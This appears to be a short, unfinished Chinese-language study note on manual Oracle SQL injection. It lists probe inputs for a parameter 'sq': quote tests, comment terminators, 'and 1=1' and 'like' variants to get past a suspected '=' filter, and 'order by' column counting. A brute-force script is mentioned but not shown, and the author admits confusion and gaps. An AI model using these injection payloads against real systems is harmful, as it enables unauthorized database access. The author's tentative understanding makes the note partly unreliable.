准备
耐心
过程
oracle注入
简单尝试
sq === 1'
如果报错存在sql注入sq === 1' --
正常运行sq === 1' and 1=1 --
报错(可能过滤了=)sq === 1' and 1 like 1 --
正常运行
注入字段数量
sq === 1' order by 22 --
正常运行sq === 1' order by 23 --
报错(说明有22个字段)
但是,有时候会不对,不懂。猜测是当前表,而不是dual表
爆破dual字段数量
判断字段类型
可以手动一个一个试,但是字段多了就不容易了。
这里写了一个简单的爆破脚本
接着
还没有学会,学会来在来更新吧!